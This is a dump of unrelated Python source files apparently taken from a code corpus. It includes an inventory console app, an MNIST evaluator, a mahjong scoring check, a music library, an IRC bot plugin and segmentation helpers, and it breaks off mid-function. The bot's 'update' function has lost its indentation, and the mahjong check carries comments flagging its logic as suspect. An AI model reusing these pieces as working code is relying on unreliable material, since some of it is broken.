    """Console input layer: prompts the user and returns raw values for the controller."""

    def enter_info(self):
        """Prompt for every field of a new product.

        Returns (id, name, price, quantity, date_added).
        Raises ValueError if id/price/quantity are not numeric.
        """
        print('[InputView]')
        id_ = int(input('Product ID: '))
        name_ = input('Name: ')
        price_ = float(input('Price: '))
        quantity_ = int(input("Quantity: "))
        date_ = input('Date Added: ')
        return id_, name_, price_, quantity_, date_

    def enter_id_search(self):
        """Prompt for a product id to search for; returns it as int."""
        id_ = int(input('[InputView]\nSearch ID number: '))
        return id_

    def enter_delete_alldb(self):
        """Ask a y/n confirmation before wiping the database; re-prompts on bad input."""
        while True:
            d = input('Delete ALL data in db?(y/n)\n')
            if d.lower() == 'y':
                return True
            elif d.lower() == 'n':
                return False
            else:
                print('[error] Number invalid..')

    def enter_delete_id(self):
        """Prompt for the id of the product to delete; returns it as int."""
        num_ = int(input('[InputView]\nEnter ID (to be deleted): '))
        return num_

    def enter_update_id(self):
        """Prompt for an id plus new price/quantity; blanks mean "unchanged".

        BUG FIX: the prompts advertise "BLANK if unchanged" but the original fed
        the raw string straight to float()/int(), so a blank answer crashed with
        ValueError.  Blank answers now yield None, which the output layer's
        "Update unsuccessful(no input values)" path already anticipates.
        """
        print('[InputView]')
        id_ = int(input('Product ID(to be updated): '))
        price_raw = input('Update Price (BLANK if unchanged): ').strip()
        price_ = float(price_raw) if price_raw else None
        quantity_raw = input('Update Quantity (BLANK if unchanged): ').strip()
        quantity_ = int(quantity_raw) if quantity_raw else None
        return id_, price_, quantity_
class OutputView:
    """Console output layer: renders query results and operation outcomes."""

    def show_all(self, product_list: list):
        """Print every row as a Product."""
        for row in product_list:
            print(Product(row[0], row[1], row[2], row[3], row[4]))

    def show_id_search(self, product_list: list):
        """Print the first matching row; True when a match was found."""
        print('[OutputView] Id search..')
        if not product_list:
            print('No Match..')
            return False
        first = product_list[0]
        print(Product(first[0], first[1], first[2], first[3], first[4]))
        return True

    def show_delete_alldb(self, confirm_):
        """Report the outcome of a delete-all operation."""
        print('[OutputView] Delete all in db..')
        print("Successful.." if confirm_ else "Delete failed (nothing in db)..")

    def show_cancel_delete(self):
        """Report that the user backed out of the delete."""
        print('[OutputView]')
        print('Delete cancelled')

    def show_delete_id(self, confirm_):
        """Report the outcome of a delete-by-id operation."""
        print('[OutputView] Delete id in db..')
        print("Delete successful.." if confirm_ else "Id not in db..")

    def show_update_id(self, confirm_):
        """Report the outcome of an update operation."""
        print('[OutputView] Update id in db..')
        print("Update successful.." if confirm_ else "Update unsuccessful(no input values)")
class MenuView:
    """Console menu: holds the choice codes and reads the user's selection."""

    def __init__(self):
        self.choice = None  # last selection read by nav()
        self.choose_execute = 1
        self.choose_search_alldb = 2
        self.choose_search_id = 3
        self.choose_delete_alldb = 4
        self.choose_delete_id = 5
        self.choose_update_id = 6
        self.choose_end = 9

    def nav(self):
        """Show the menu, read the user's numeric choice and store it on self.choice."""
        prompt = '''\n[ShopMenu]
⑴ Add New
⑵ Return Everything
⑶ Search by ID
⑷ Delete Everything
⑸ Delete by ID
⑹ Update Price, Quantity
⑼ Exit
➤➤ '''
        self.choice = int(input(prompt))
1989059 | # -- coding: utf-8 --
import gzip
import os
import pickle
import numpy as np
from neuron_network.activation_function import sigmoid, softmax_avoid_overflow
def one_hot_function(x, num_class=None):
    """One-hot encode integer labels *x* into a (len(x), num_class) matrix.

    :param x: 1-D sequence/array of non-negative integer class ids.
    :param num_class: number of columns; inferred as max(x) + 1 when omitted.
    :return: float ndarray with a single 1 per row.
    """
    # BUG FIX: the original tested `if not num_class`, which also re-inferred
    # the width when an explicit 0 was passed; test for None instead.
    if num_class is None:
        num_class = np.max(x) + 1
    ohx = np.zeros([len(x), num_class])
    ohx[range(len(x)), x] = 1
    return ohx
def _read_mnist_labels(path, one_hot):
    """Read one gzipped MNIST label file (8-byte header) as uint8, optionally one-hot."""
    with gzip.open(path, 'rb') as lbpath:
        labels = np.frombuffer(lbpath.read(), np.uint8, offset=8)
    if one_hot:
        labels = one_hot_function(labels)
    return labels


def _read_mnist_images(path, num_images, flattern, normalize):
    """Read one gzipped MNIST image file (16-byte header) as uint8 28x28 images."""
    shape = (num_images, 28 * 28) if flattern else (num_images, 28, 28)
    with gzip.open(path, 'rb') as imgpath:
        images = np.frombuffer(imgpath.read(), np.uint8, offset=16).reshape(shape)
    if normalize:
        # Scale [0, 255] to [-1, 1].
        images = (images / 127.5) - 1
    return images


def load_mnist(data_folder=r'D:\AI\myData\mnist', flattern=False, one_hot=False, normalize=False):
    """Load the local MNIST gzip files and return numpy arrays.

    :param data_folder: directory holding the four idx gzip files.
    :param flattern: flatten each image to a 784-vector instead of 28x28.
    :param one_hot: one-hot encode the labels.
    :param normalize: scale pixels from [0, 255] to [-1, 1].
    :return: (x_train, y_train), (x_test, y_test)
    """
    files = [
        'train-labels-idx1-ubyte.gz', 'train-images-idx3-ubyte.gz',
        't10k-labels-idx1-ubyte.gz', 't10k-images-idx3-ubyte.gz'
    ]
    paths = [os.path.join(data_folder, fname) for fname in files]
    # The train/test pipelines were copy-pasted in the original; share helpers instead.
    y_train = _read_mnist_labels(paths[0], one_hot)
    x_train = _read_mnist_images(paths[1], len(y_train), flattern, normalize)
    y_test = _read_mnist_labels(paths[2], one_hot)
    x_test = _read_mnist_images(paths[3], len(y_test), flattern, normalize)
    return (x_train, y_train), (x_test, y_test)
def get_data():
    """Load the flattened, one-hot-labelled MNIST test split as (images, labels)."""
    (_, _), (x_test, y_test) = load_mnist(
        r'D:\AI\myData\mnist', flattern=True, one_hot=True, normalize=False)
    return x_test, y_test
def init_network():
    """Deserialize pretrained weights from sample_weight.pkl in the CWD.

    NOTE: pickle executes arbitrary code on load — only use a trusted weight file.
    """
    with open('sample_weight.pkl', 'rb') as fh:
        return pickle.load(fh)
def predict(network, x):
    """Forward pass through the 3-layer MLP: sigmoid, sigmoid, then softmax.

    :param network: dict with weight matrices W1-W3 and bias vectors b1-b3.
    :param x: input vector or batch of flattened images.
    :return: softmax class probabilities.
    """
    activation = x
    for layer in ('1', '2'):
        pre = np.dot(activation, network['W' + layer]) + network['b' + layer]
        activation = sigmoid(pre)
    logits = np.dot(activation, network['W3']) + network['b3']
    return softmax_avoid_overflow(logits)
def calculate_accuracy_onebyone():
    """Classify the MNIST test set one sample at a time and return the accuracy.

    BUG FIX: get_data() loads labels with one_hot=True, so the original
    comparison ``np.argmax(y) == t[i]`` compared an int against a one-hot
    vector; compare argmax against argmax instead.
    """
    x, t = get_data()
    network = init_network()
    accuracy_cnt = 0
    for i in range(len(x)):
        y = predict(network, x[i])
        if np.argmax(y) == np.argmax(t[i]):
            accuracy_cnt += 1
    return float(accuracy_cnt / len(x))
def calculate_accuracy_batch(batchsize):
    """Classify the MNIST test set in mini-batches and return the accuracy.

    BUG FIX: get_data() loads labels with one_hot=True, so the original
    ``index == t[i: i + batchsize]`` broadcast a (batch,) int array against a
    (batch, classes) one-hot array, inflating the count; compare argmax rows.
    """
    x, t = get_data()
    network = init_network()
    accuracy_cnt = 0
    for i in range(0, len(x), batchsize):
        x_batch = x[i: i + batchsize]
        y_batch = predict(network, x_batch)
        index = np.argmax(y_batch, axis=1)  # predicted class per row
        accuracy_cnt += np.sum(index == np.argmax(t[i: i + batchsize], axis=1))
    return float(accuracy_cnt / len(x))
69942 | # coding=utf-8
import copy
import time
from service.mahjong.models.hutype.basetype import BaseType
from service.mahjong.constants.carddefine import CardType
from service.mahjong.models.hutype.basetype import BaseType
from service.mahjong.constants.carddefine import CardType, CARD_SIZE
from service.mahjong.models.card.hand_card import HandCard
from service.mahjong.models.utils.cardanalyse import CardAnalyse
class YiSeSanBuGao(BaseType):
    """
    One-suit three stepped runs (yi se san bu gao): the winning hand contains
    three chows of a single suit whose starting values increase by one or by
    two each step.
    """
    def __init__(self):
        super(YiSeSanBuGao, self).__init__()

    def is_this_type(self, hand_card, card_analyse):
        """Check whether the hand matches this scoring pattern.

        NOTE(review): nesting reconstructed from a whitespace-stripped source;
        the trailing print(s) looks like leftover debug output, and the
        ``s[1][2] == s[2][2]`` comparison (last-tile vs last-tile) looks
        suspect next to the other start/end checks — verify against upstream.
        """
        chi_card_vals = hand_card.chi_card_vals
        ret = card_analyse.get_jiang_ke_shun_plus(hand_card.hand_card_vals)
        for index in range(len(ret)):
            s = ret[index]["s"]
            # NOTE(review): extend mutates the decomposition stored in ret in place.
            s.extend(chi_card_vals)
            if len(s) < 3:
                return False
            s.sort()
            # Step of one: next run starts on the previous run's second tile.
            if s[0][1] == s[1][0] and s[0][2] == s[2][0]:
                return True
            # Step of two: next run starts on the previous run's third tile.
            if s[0][2] == s[1][0] and s[1][2] == s[2][2]:
                return True
            if len(s) == 4:
                if s[1][1] == s[2][0] and s[1][2] == s[3][0]:
                    return True
                if s[1][2] == s[2][0] and s[2][2] == s[3][2]:
                    return True
            print(s)
        return False
# Manual smoke test: build a fixed hand and time the pattern check.
if __name__ == "__main__":
    pass
    card_analyse = CardAnalyse()
    hand_card = HandCard(0, None)
    # hand_card.hand_card_info = {
    #     1: [9, 1, 1, 1, 1, 1, 1, 1, 1, 1],  # wan (characters)
    #     2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # tiao (bamboos)
    #     3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # bing (dots)
    #     4: [2, 2, 0, 0, 0],  # winds
    #     5: [3, 3, 0, 0],  # dragons
    # }
    # Index 0 holds the suit total; indices 1..9 hold per-rank counts.
    hand_card.hand_card_info = {
        1: [12, 2, 2, 2, 2, 2, 2, 0, 0, 0],  # wan (characters)
        2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # tiao (bamboos)
        3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # bing (dots)
        4: [0, 0, 0, 0, 0],  # winds
        5: [2, 2, 0, 0],  # dragons
    }
    hand_card.handle_hand_card_for_settle_show()
    hand_card.union_hand_card()
    print("hand_card =", hand_card.hand_card_vals)
    test_type = YiSeSanBuGao()
    start_time = time.time()
    print(test_type.is_this_type(hand_card, card_analyse))
    print("time = ", time.time() - start_time)
220038 | """
fuocore.library
---------------
"""
import logging
from .utils import log_exectime
logger = logging.getLogger(__name__)
class Library(object):
    """library manages a set of providers

    Library is the entry point for music resources
    """

    def __init__(self):
        # Unordered, so list()/search() iterate providers in no fixed order.
        self._providers = set()

    def register(self, provider):
        """add a provider to library"""
        self._providers.add(provider)

    def deregister(self, provider):
        """remove a provider to library"""
        self._providers.remove(provider)

    def get(self, identifier):
        """get provider by id, or None when no provider matches"""
        for provider in self._providers:
            if provider.identifier == identifier:
                return provider
        return None

    def list(self):
        """list all providers"""
        return list(self._providers)

    def search(self, keyword, source_in=None, **kwargs):
        """search song/artist/album by keyword; yields one result per provider

        Failures in a single provider are logged and skipped so the other
        providers still get searched.

        TODO: search album or artist
        """
        for provider in self._providers:
            if source_in is not None:
                if provider.identifier not in source_in:
                    continue
            try:
                result = provider.search(keyword=keyword)
            except Exception as e:
                logger.exception(str(e))
                logger.error('Search %s in %s failed.' % (keyword, provider))
            else:
                yield result

    @log_exectime
    def list_song_standby(self, song, onlyone=True):
        """try to list all valid standby

        Search a song in all providers. The typical usage scenario is when a
        song is not available in one provider, we can try to acquire it from other
        providers.

        Standby choosing strategy: search from all providers, select two song from each provide.
        Those standby song should have same title and artist name.

        TODO: maybe we should read a strategy from user config, user
        knows which provider owns copyright about an artist.

        FIXME: this method will send several network requests,
        which may block the caller.

        :param song: song model
        :param onlyone: stop after the first playable standby
        :return: list of songs (maximum count: 2)
        """
        def get_score(standby):
            score = 1
            # Score weighting: title + album outweigh artist;
            # artist > title > album individually.
            if song.artists_name != standby.artists_name:
                score -= 0.4
            if song.title != standby.title:
                score -= 0.3
            if song.album_name != standby.album_name:
                score -= 0.2
            return score

        # Never ask the song's own provider for a standby.
        valid_sources = [p.identifier for p in self.list() if p.identifier != song.source]
        q = '{} {}'.format(song.title, song.artists_name)
        standby_list = []
        for result in self.search(q, source_in=valid_sources, limit=10):
            # Take at most two candidates from each provider's result.
            for standby in result.songs[:2]:
                standby_list.append(standby)
        standby_list = sorted(
            standby_list,
            key=lambda standby: get_score(standby), reverse=True
        )
        # Keep only candidates with a playable url; stop early on a perfect
        # match (score 1) or when the caller wants a single standby.
        # NOTE(review): break nesting reconstructed from whitespace-stripped
        # source — verify against upstream feeluown/fuocore.
        valid_standby_list = []
        for standby in standby_list:
            if standby.url:
                valid_standby_list.append(standby)
                if get_score(standby) == 1 or onlyone:
                    break
            if len(valid_standby_list) >= 2:
                break
        return valid_standby_list
| StarcoderdataPython |
6590310 | <reponame>ark120202/ModDotaFAQ
import simplejson
import string
import time
import traceback
import logging
import requests
# Plugin command metadata consumed by the bot framework.
ID="api" # command identifier: the chat command name (e.g. "=api <query>")
permission=0 # minimum permission rank allowed to run the command (0 = everyone)
import collections
def update(d, u):
for k, v in u.iteritems():
if isinstance(v, collections.Mapping):
r = update(d.get(k, {}), v)
d[k] = r
else:
d[k] = u[k]
return d
class ModDotaAPI:
    """Fetches and caches the ModDota server-side Lua API dump from GitHub."""

    def __init__(self):
        self.requests_session = requests.Session()
        # Identify the bot explicitly instead of using the default requests UA.
        self.requests_session.headers = {
            'User-agent': 'ModDota_API/1.X (+http://github.com/SinZ163/ModDotaFAQ)'
        }
        # NOTE: performs network requests immediately on construction.
        self.ReadDump()

    def fetch_page(self, url, timeout=10, decode_json=True):
        """GET *url* via the shared session; parsed JSON unless decode_json is False."""
        request = self.requests_session.get(url, timeout=timeout)
        if decode_json:
            return request.json()
        else:
            return request.text

    def ReadDump(self):
        """Download the generated API dump plus community overrides and merge them."""
        #serverInfo = self.fetch_page("https://raw.githubusercontent.com/ModDota/API/master/_data/lua_server.json")
        serverInfo = self.fetch_page("https://raw.githubusercontent.com/SinZ163/TestTracking/master/lua_server.json")
        communityInfo = self.fetch_page("https://raw.githubusercontent.com/ModDota/API/master/_data/override_lua_server.json")
        self.lua_server = serverInfo.copy()
        # Community overrides win: deep-merged on top of the generated dump.
        self.lua_server = update(self.lua_server, communityInfo)
        #TODO: add community db here and inject into lua_server
# Module-level singletons shared by execute().
MDAPI_logger = logging.getLogger("MDAPI_Reborn")
# NOTE(review): constructing ModDotaAPI here fetches the API dump over the
# network at import time — confirm that is intended.
modDotaAPI = ModDotaAPI()
#called when the bot has loaded everything and is connected
def __initialize__(self, Startup):
    """Plugin lifecycle hook; this command needs no startup work."""
    pass
#the command entry point from '=api" or something
def execute(self, name, params, channel, userdata, rank):
    """Search the cached Lua API dump for functions whose name contains the
    query and send IRC-formatted signatures back to the channel, or privately
    when the match list is large (6-20 hits; >20 is refused).
    """
    msg = " ".join(params)
    functions = []
    output = channel
    #TODO: add logic to figure out which dump we want
    # Case-insensitive substring match over every class's function names.
    for Class, ClassInfo in modDotaAPI.lua_server.iteritems():
        for FunctionName, FunctionInfo in ClassInfo["functions"].iteritems():
            #print(FunctionName)
            if msg.lower() in FunctionName.lower():
                MDAPI_logger.info("Found a method, "+FunctionName)
                functions.append((Class, FunctionName))
    if len(functions) == 0:
        self.sendMessage(channel, "No results found.")
    if len(functions) > 5:
        #pm it
        if name == "DB" or len(functions) > 20:
            self.sendMessage(channel, "Too many functions matched ("+str(len(functions))+"). Please refine your search.")
            return
        else:
            # Redirect the replies to the requesting user instead of the channel.
            output = name
            self.sendMessage(channel, "Too many functions matched ("+str(len(functions))+"). replying privately.")
    # mIRC text-formatting control codes.
    colBold = chr(2)
    colItalics = chr(29)
    colGreen = chr(3)+"03"
    colBlue = chr(3)+"02"
    colBrown = chr(3)+"07"
    colEnd = chr(3)
    for function in functions:
        className = function[0]
        functionName = function[1]
        functionInfo = modDotaAPI.lua_server[className]["functions"][functionName]
        argInfo = ""
        description = ""
        if "args" in functionInfo:
            if len(functionInfo["args"]) > 0:
                #We have argument info
                for index, arg in enumerate(functionInfo["args"]):
                    if index > 0:
                        argInfo = argInfo + ", "
                    if "arg_names" in functionInfo:
                        if len(functionInfo["arg_names"]) > 0:
                            #we have argument info with named variables
                            argInfo = argInfo + u"{nullable}{colBrown}{argType}{colBrown}{nullable} {colBlue}{argName}{colEnd}".format(
                                colBrown = colBrown,
                                colBlue = colBlue,
                                colEnd = colEnd,
                                argType = arg,
                                argName = functionInfo["arg_names"][index],
                                nullable = colItalics if "?" in arg else ""
                            )
                            continue
                    # Type-only rendering when no argument names are available.
                    argInfo = argInfo + u"{nullable}{colBrown}{argType}{colEnd}{nullable}".format(
                        colBrown = colBrown,
                        colEnd = colEnd,
                        argType = arg,
                        nullable = colItalics if "?" in arg else ""
                    )
        if argInfo != "":
            argInfo = " " + argInfo + " "
        if "description" in functionInfo:
            description = "{colGreen} -- {description}{colEnd}".format(
                description = functionInfo["description"],
                colGreen = colGreen,
                colEnd = colEnd
            )
        #self.sendMessage(output, "["+method[0]+"] "+modDotaAPI.db[method[0]]["methods"][method[1]]["return"] + " " + method[1] + colBold+"(" + colBold + msg + colBold+")" + colBold + comment)
        self.sendMessage(output, "[{colBlue}{className}{colEnd}] {colBrown}{returnType}{colEnd} {name}{bold}({bold}{argInfo}{bold}){bold} {description}".format(
            bold = colBold,
            italic = colItalics,
            colBlue = colBlue,
            colBrown = colBrown,
            colEnd = colEnd,
            className = className,
            name = functionName,
            returnType = functionInfo["return"],
            argInfo = argInfo,
            description = description
        ))
1776620 | <reponame>xtero/webSound
from setuptools import setup
# Packaging metadata for the webSound notification-sound web server.
setup( name='webSound',
    version='0.1',
    description='Web server to handle notification handle trigger sounds',
    author='<NAME>',
    author_email="<EMAIL>",
    # NOTE(review): the shipped package is 'animator' — confirm that is
    # intentional for a project named webSound.
    packages=['animator'],
    install_requires=[
        'flask',
        'flask_restful',
        'python-vlc'
    ],
    zip_safe=False)
4801544 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: segmentation.py
# Author: <NAME> <<EMAIL>>
import numpy as np
from math import ceil
import cv2,colorsys
import pydensecrf.densecrf as dcrf
import os, sys
from tensorpack.utils import logger
from tensorpack.utils.palette import PALETTE_RGB
__all__ = ['update_confusion_matrix', 'predict_slider']
# Colour map. #BGR order. Index = class id; unused classes are black.
label_colours = [(35,142,107),(70,70,70),(128,64,128),(142,0,0),(0,0,0)
                # 0=vegetation, 1=building, 2=road 3=vehicle, 4=other
                ,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)
                ,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)
                ,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)]
# coco
# label_colours = [(0,0,0)
# 0=background
# ,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# # 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
# ,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# # 6=bus, 7=car, 8=cat, 9=chair, 10=cow
# ,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# # 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
# ,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# # 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
id_to_name = {
0:"background",
1:"aeroplane",
2:"bicycle",
3:"bird",
4:"boat",
5:"bottle",
6:"bus",
7:"car",
8:"cat",
9:"chair",
10:"cow",
11:"diningtable",
12:"dog",
13:"horse",
14:"motorbike",
15:"person",
16:"plant",
17:"sheep",
18:"sofa",
19:"train",
20:"tv/monitor"
}
ignore_color = (255,255,255)  # painted for ignore_label pixels in visualize_label
fuzzy_color = (64,0,128)  # painted for multi-class (soft) pixels in visualize_mixlabel
label2_colours = [(192,128,0),(64,0,128)]
def update_confusion_matrix(pred, label, conf_m, nb_classes, ignore = 255):
    """Accumulate a batch into confusion matrix *conf_m* (in place) and return it.

    Rows index the ground-truth class, columns the predicted class. Pixels
    whose label equals *ignore* are skipped; predictions outside
    [0, nb_classes) are dropped, matching the original per-cell loop.
    """
    valid = label != ignore
    seg_gt = label[valid].astype('int32')
    seg_pred = pred[valid].astype('int32')
    index = (seg_gt * nb_classes + seg_pred).astype('int32')
    # Vectorised replacement for the original O(nb_classes^2) Python double
    # loop; the slice discards out-of-range predictions exactly as before.
    counts = np.bincount(index, minlength=nb_classes * nb_classes)[:nb_classes * nb_classes]
    conf_m += counts.reshape(nb_classes, nb_classes)
    return conf_m
def imwrite_grid(image, label, prediction, uncertainty, border, prefix_dir, imageId):
    """Split the inputs into border x border patches and write each patch row
    (image | colourised label | colourised prediction | uncertainty) to
    prefix_dir as out<imageId>_patch<i>_<j>.png.

    BUG FIX: ``h / border`` is a float under Python 3, which made
    ``range(grid_num)`` raise TypeError; use integer division.
    """
    h, w, _ = image.shape
    grid_num = h // border
    for i in range(grid_num):
        for j in range(grid_num):
            start_i = border * i
            start_j = border * j
            end_i = border * (i + 1)
            end_j = border * (j + 1)
            cv2.imwrite(os.path.join(prefix_dir, "out{}_patch{}_{}.png".format(imageId, i, j)),
                        np.concatenate((image[start_i:end_i, start_j:end_j],
                                        visualize_label(label[start_i:end_i, start_j:end_j]),
                                        visualize_label(prediction[start_i:end_i, start_j:end_j]),
                                        uncertainty[start_i:end_i, start_j:end_j]), axis=1))
def pad_image(img, target_size):
    """Zero-pad *img* (H, W, C) on the bottom/right up to *target_size*.

    :return: (padded_img, [row_start, row_end, col_start, col_end]) where the
        index list delimits the region of the padded image holding the
        original content.
    """
    rows_missing = max(target_size[0] - img.shape[0], 0)
    cols_missing = max(target_size[1] - img.shape[1], 0)
    # BUG FIX: the original wrapped np.pad in try/except that printed the error
    # and fell through to an unbound `padded_img` (guaranteed NameError on
    # failure); let np.pad raise directly so the real problem is visible.
    padded_img = np.pad(img, ((0, rows_missing), (0, cols_missing), (0, 0)), 'constant')
    return padded_img, [0, target_size[0] - rows_missing, 0, target_size[1] - cols_missing]
def pad_edge(img, target_size):
    """Zero-pad an edge map (H, W, C) on the bottom/right up to *target_size*.

    Returns the padded array plus [row_start, row_end, col_start, col_end],
    the slice of the padded array that holds the original content.
    """
    pad_rows = max(target_size[0] - img.shape[0], 0)
    pad_cols = max(target_size[1] - img.shape[1], 0)
    padded = np.pad(img, ((0, pad_rows), (0, pad_cols), (0, 0)), 'constant')
    valid_region = [0, target_size[0] - pad_rows, 0, target_size[1] - pad_cols]
    return padded, valid_region
def apply_mask(image, mask, color, alpha=0.5):
    """Alpha-blend *color* (scaled by 255) into *image* wherever mask == 1.

    Mutates *image* in place and returns it.
    """
    for ch in range(3):
        plane = image[:, :, ch]
        blended = plane * (1 - alpha) + alpha * color[ch] * 255
        image[:, :, ch] = np.where(mask == 1, blended, plane)
    return image
#https://github.com/matterport/Mask_RCNN/blob/master/visualize.py
def visualize_binary_mask(image, label, color, class_num, alpha=0.5):
    """Overlay a single *color* (alpha-blended, unscaled) on every
    non-background class pixel.

    Operates on a copy; classes 1..class_num-1 all receive the same colour
    while background (0) keeps the original pixels.
    """
    blended = np.copy(image)
    for cls in range(1, class_num):  # background (0) gets no mask
        hit = label == cls
        for ch in range(3):
            plane = blended[:, :, ch]
            blended[:, :, ch] = np.where(hit, plane * (1 - alpha) + alpha * color[ch], plane)
    return blended
def crop_saliency(img, label):
    """Return a copy of *img* whitened (255) wherever *label* is zero.

    A 2-D label is broadcast across the three colour channels first.
    """
    out = np.copy(img)
    mask = label
    if mask.ndim == 2:
        mask = mask[:, :, np.newaxis] * np.ones((1, 1, 3))
    out[mask == 0] = 255  # white out non-salient pixels
    return out
def visualize_label(label, class_num=21, ignore_label=255):
    """Map an integer label image to a BGR colour image.

    Two-class maps use white/black for maximum contrast; maps wider than the
    built-in 21-colour list fall back to PALETTE_RGB (reversed into BGR);
    otherwise the module's label_colours list is used. Pixels equal to
    *ignore_label* are painted with ignore_color.
    """
    if len(label.shape) == 3:
        label = np.squeeze(label)
    height, width = label.shape
    canvas = np.zeros((height, width, 3)).astype('uint8')
    if class_num == 2:
        palette = [(255, 255, 255), (0, 0, 0)]
    elif class_num > 21:
        palette = [PALETTE_RGB[i][::-1] for i in range(class_num)]
    else:
        palette = label_colours
    for cls in range(class_num):
        canvas[label == cls] = palette[cls]
    canvas[label == ignore_label] = ignore_color  # highlight ignored pixels
    return canvas
def visualize_uncertainty(prob):
    """Collapse an (H, W, C) probability map to the per-pixel max class
    probability, scaled to the 0-255 range."""
    return np.amax(prob, axis=2) * 255
def visualize_strict_uncertainty(prob, label):
    """Per-pixel probability assigned to the *ground-truth* class, scaled to 0-255.

    NOTE(review): the author's inline TODO already flags this as buggy —
    ignore labels (255) index past the class axis — so the behaviour is kept
    as-is rather than silently changed.
    """
    h, w, c = prob.shape
    gt = np.reshape(label, (h*w))
    prob = np.reshape(prob, (h*w, c))
    gt_idx = np.where(gt > -1)[0]  # indices of all pixels (gt is unsigned, so all pass)
    idx = np.vstack((gt_idx, gt))
    tmp = prob[list(idx)] #TODO advance index in numpy, here is buggy, because 255 ignore,index 255 is out of bounds for axis 1 with size 21
    tmp = tmp*255
    # NOTE(review): (w, h) swaps axes relative to the (h, w) input — likely
    # transposed output for non-square images; confirm intended.
    tmp = np.reshape(tmp,(w,h)).astype(np.uint8)
    return tmp
def visualize_mixlabel(label, mask):
    """Render a soft (per-class weighted) label map of shape (H, W, C) to BGR.

    Pixels with weight on more than one class are drawn in fuzzy_color;
    single-class pixels get their class colour scaled by the weight; pixels
    where *mask* is zero are painted with ignore_color.
    """
    h, w, c = label.shape
    img_color = np.zeros((h, w, 3)).astype('uint8')
    for i in range(h):
        for j in range(w):
            aa = 0
            bb = 0
            cc = 0
            # More than one class with positive weight -> ambiguous pixel.
            if len(np.where(label[i, j] > 0)[0]) > 1:
                img_color[i, j] = fuzzy_color
                continue
            for k in range(c):
                if label[i, j, k] > 0:
                    aa += label[i, j, k] * label_colours[k][0]
                    # BUG FIX: the original read `bb + ...`, discarding the
                    # green-channel contribution entirely.
                    bb += label[i, j, k] * label_colours[k][1]
                    cc += label[i, j, k] * label_colours[k][2]
            img_color[i, j] = [aa, bb, cc]
    img_color[mask == 0] = ignore_color  # highlight ignored pixels
    return img_color
def edge_predict_slider(full_image, edge, predictor, classes, tile_size):
    """Run *predictor* over overlapping tiles of the image + edge map and
    average the per-pixel class probabilities.

    slider is responsible for generating the sliding windows; a window may be
    smaller than the original image (when the image is smaller than
    tile_size), so windows are padded up to the fixed network input size and
    the padding is cropped from each prediction before accumulation.

    :param predictor: callable taking (image_batch, edge_batch) and returning
        per-pixel class probabilities; exact output layout assumed to match
        [0][0] indexing below — confirm against the model wrapper.
    :return: (H, W, classes) float array of averaged probabilities.
    """
    tile_size = (tile_size, tile_size)
    overlap = 1/3
    stride = ceil(tile_size[0] * (1 - overlap))
    tile_rows = int(ceil((full_image.shape[0] - tile_size[0]) / stride) + 1)  # strided convolution formula
    tile_cols = int(ceil((full_image.shape[1] - tile_size[1]) / stride) + 1)
    full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
    # Per-pixel visit counter used to average the overlapping predictions.
    count_predictions = np.zeros((full_image.shape[0], full_image.shape[1], classes))
    tile_counter = 0
    for row in range(tile_rows):
        for col in range(tile_cols):
            x1 = int(col * stride)
            y1 = int(row * stride)
            x2 = min(x1 + tile_size[1], full_image.shape[1])
            y2 = min(y1 + tile_size[0], full_image.shape[0])
            x1 = max(int(x2 - tile_size[1]), 0)  # for portrait images the x1 underflows sometimes
            y1 = max(int(y2 - tile_size[0]), 0)  # for very few rows y1 underflows
            img = full_image[y1:y2, x1:x2]
            ed = edge[y1:y2, x1:x2]
            # Padding only kicks in when the source image is smaller than tile_size.
            padded_img, padding_index = pad_image(img, tile_size)
            padded_ed, padding_ed_index = pad_image(ed, tile_size)
            tile_counter += 1
            padded_img = padded_img[None, :, :, :].astype('float32')  # add batch dimension
            padded_ed = np.squeeze(padded_ed)
            padded_ed = padded_ed[None, :, :].astype('float32')  # add batch dimension
            padded_prediction = predictor(padded_img, padded_ed)[0][0]
            # Crop the prediction back to the un-padded region.
            prediction_no_padding = padded_prediction[padding_index[0]:padding_index[1], padding_index[2]:padding_index[3], :]
            count_predictions[y1:y2, x1:x2] += 1
            full_probs[y1:y2, x1:x2] += prediction_no_padding  # accumulate the predictions also in the overlapping regions
    # average the predictions in the overlapping regions
    full_probs /= count_predictions
    return full_probs
def edge_predict_scaler(full_image, edge, predictor, scales, classes, tile_size, is_densecrf=True):
    """Multi-scale wrapper around :func:`edge_predict_slider`.

    The image/edge pair is resized to each factor in ``scales``, run through
    the sliding-window predictor, resized back to the original resolution,
    and the probability maps are averaged.  Optionally refines the result
    with a dense CRF.

    Args:
        full_image: H x W x C image array.
        edge: H x W (or H x W x 1) edge map; a channel axis is re-added
            after cv2.resize drops it.
        predictor: callable passed through to ``edge_predict_slider``.
        scales: iterable of resize factors, e.g. ``[0.9, 1, 1.1]``.
        classes: number of output classes.
        tile_size: sliding-window side length.
        is_densecrf: when True, post-process the averaged map with dense_crf.

    Returns:
        H x W x classes array of averaged (and optionally CRF-refined) probabilities.
    """
    full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
    h_ori, w_ori = full_image.shape[:2]
    for scale in scales:
        scaled_img = cv2.resize(full_image, (int(scale * w_ori), int(scale * h_ori)))
        # cv2.resize on a single-channel array drops the trailing channel
        # axis, so the edge map is re-expanded with [:, :, None] below.
        scaled_edge = cv2.resize(edge, (int(scale * w_ori), int(scale * h_ori)))
        scaled_probs = edge_predict_slider(scaled_img, scaled_edge[:, :, None], predictor, classes, tile_size)
        probs = cv2.resize(scaled_probs, (w_ori, h_ori))
        if probs.ndim == 2:
